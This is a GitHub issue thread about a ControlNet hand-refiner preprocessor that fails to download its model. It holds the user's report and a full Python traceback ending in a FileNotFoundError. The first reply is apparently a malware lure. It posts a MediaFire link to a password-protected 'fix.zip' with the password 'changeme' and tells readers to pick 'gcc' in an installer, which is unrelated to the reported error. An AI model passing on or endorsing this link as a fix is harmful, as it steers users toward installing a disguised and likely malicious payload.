### ISSUE TITLE
[Bug]: Issue downloading files?

### ISSUE THREAD

**Issue by u2arejust2cute** [Mikubill/sd-webui-controlnet#3040]
### Is there an existing issue for this?

- [X] I have searched the existing issues and checked the recent builds/commits of both this extension and the webui

### What happened?

tldr: FileNotFoundError:   [Errno 2] No such file or directory: ...sd-webui-controlnet\\annotator\\downloads\\hand_refiner\\hr16\\ControlNet-HandRefiner-pruned\\.huggingface\\download\\graphormer_hand_state_dict.bin.b78081d105dc730c179eb0e2366bea999ceb4363070bb3aa1ae31fcf878a8a41.incomplete'

I tried some new ways to fix hands. One of them was the Controlnet depth_hand_refiner. I update my addons. Didn't see the model for hand fixing, so I manually downloaded that and placed in the folder, restarted a1111.

When using controlnet with depth hand refiner and control_sd15_inpaint_depth_hand_fp16 [09456e54], I get the error on top saying it doesn't find a file and it seems like it can't download it either.

### Steps to reproduce the problem

When using controlnet with depth hand refiner and control_sd15_inpaint_depth_hand_fp16 [09456e54], I get the error on top saying it doesn't find a file and it seems like it can't download it either.

### What should have happened?

Generation of a depth map for the model

### Commit where the problem happens

webui: version: [v1.10.1](https://github.com/AUTOMATIC1111/stable-diffusion-webui/commit/82a973c04367123ae98bd9abdf80d9eda9b910e2)  •  python: 3.10.11  •  torch: 2.1.2+cu121  •  xformers: 0.0.23.post1  •  gradio: 3.41.2
controlnet: ControlNet v1.1.455

These?

### Command Line Arguments

```Shell
xformers
```

### List of enabled extensions

![image](https://github.com/user-attachments/assets/34bb0f3f-bc32-45a3-b80a-192eb8665192)

### Console logs

```Shell
2024-08-26 15:43:40,385 - ControlNet - INFO - unit_separate = False, style_align = False
2024-08-26 15:43:40,386 - ControlNet - INFO - Loading model from cache: control_sd15_inpaint_depth_hand_fp16 [09456e54]
2024-08-26 15:43:40,478 - ControlNet - INFO - Using preprocessor: depth_hand_refiner
2024-08-26 15:43:40,478 - ControlNet - INFO - preprocessor resolution = 1200
Failed to find C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\annotator\downloads\hand_refiner\hr16/ControlNet-HandRefiner-pruned\graphormer_hand_state_dict.bin.
 Downloading from huggingface.co
C:\Users\\stable-diffusion-webui\venv\lib\site-packages\huggingface_hub\file_download.py:1132: FutureWarning: `resume_download` is deprecated and will be removed in version 1.0.0. Downloads always resume when possible. If you want to force a new download, use `force_download=True`.
  warnings.warn(
*** Error running process: C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\controlnet.py
    Traceback (most recent call last):
      File "C:\Users\\stable-diffusion-webui\modules\scripts.py", line 832, in process
        script.process(p, *script_args)
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\controlnet.py", line 1228, in process
        self.controlnet_hack(p)
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\controlnet.py", line 1213, in controlnet_hack
        self.controlnet_main_entry(p)
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\controlnet.py", line 941, in controlnet_main_entry
        controls, hr_controls, additional_maps = get_control(
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\controlnet.py", line 290, in get_control
        controls, hr_controls = list(zip(*[preprocess_input_image(img) for img in optional_tqdm(input_images)]))
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\controlnet.py", line 290, in <listcomp>
        controls, hr_controls = list(zip(*[preprocess_input_image(img) for img in optional_tqdm(input_images)]))
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\controlnet.py", line 242, in preprocess_input_image
        result = preprocessor.cached_call(
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\supported_preprocessor.py", line 198, in cached_call
        result = self._cached_call(input_image, *args, **kwargs)
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\utils.py", line 82, in decorated_func
        return cached_func(*args, **kwargs)
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\utils.py", line 66, in cached_func
        return func(*args, **kwargs)
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\supported_preprocessor.py", line 211, in _cached_call
        return self(*args, **kwargs)
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\preprocessor\legacy\legacy_preprocessors.py", line 105, in __call__
        result, is_image = self.call_function(
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\preprocessor\legacy\processor.py", line 797, in run_model
        self.load_model()
      File "C:\Users\\stable-diffusion-webui\extensions\sd-webui-controlnet\scripts\preprocessor\legacy\processor.py", line 783, in load_model
        self.model = MeshGraphormerDetector.from_pretrained(
      File "C:\Users\\stable-diffusion-webui\venv\lib\site-packages\hand_refiner\__init__.py", line 14, in from_pretrained
        args.resume_checkpoint = custom_hf_download(pretrained_model_or_path, filename, cache_dir)
      File "C:\Users\\stable-diffusion-webui\venv\lib\site-packages\hand_refiner\util.py", line 178, in custom_hf_download
        model_path = hf_hub_download(repo_id=pretrained_model_or_path,
      File "C:\Users\\stable-diffusion-webui\venv\lib\site-packages\huggingface_hub\utils\_validators.py", line 114, in _inner_fn
        return fn(*args, **kwargs)
      File "C:\Users\\stable-diffusion-webui\venv\lib\site-packages\huggingface_hub\file_download.py", line 1202, in hf_hub_download
        return _hf_hub_download_to_local_dir(
      File "C:\Users\\stable-diffusion-webui\venv\lib\site-packages\huggingface_hub\file_download.py", line 1487, in _hf_hub_download_to_local_dir
        _download_to_tmp_and_move(
      File "C:\Users\\stable-diffusion-webui\venv\lib\site-packages\huggingface_hub\file_download.py", line 1872, in _download_to_tmp_and_move
        with incomplete_path.open("ab") as f:
      File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\pathlib.py", line 1119, in open
        return self._accessor.open(self, mode, buffering, encoding, errors,
    FileNotFoundError: [Errno 2] No such file or directory: 'C:\\Users\\\\stable-diffusion-webui\\extensions\\sd-webui-controlnet\\annotator\\downloads\\hand_refiner\\hr16\\ControlNet-HandRefiner-pruned\\.huggingface\\download\\graphormer_hand_state_dict.bin.b78081d105dc730c179eb0e2366bea999ceb4363070bb3aa1ae31fcf878a8a41.incomplete'
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by u2arejust2cute** [comment]
Downloading other models for controlnet (depth anything v2) are working for me.
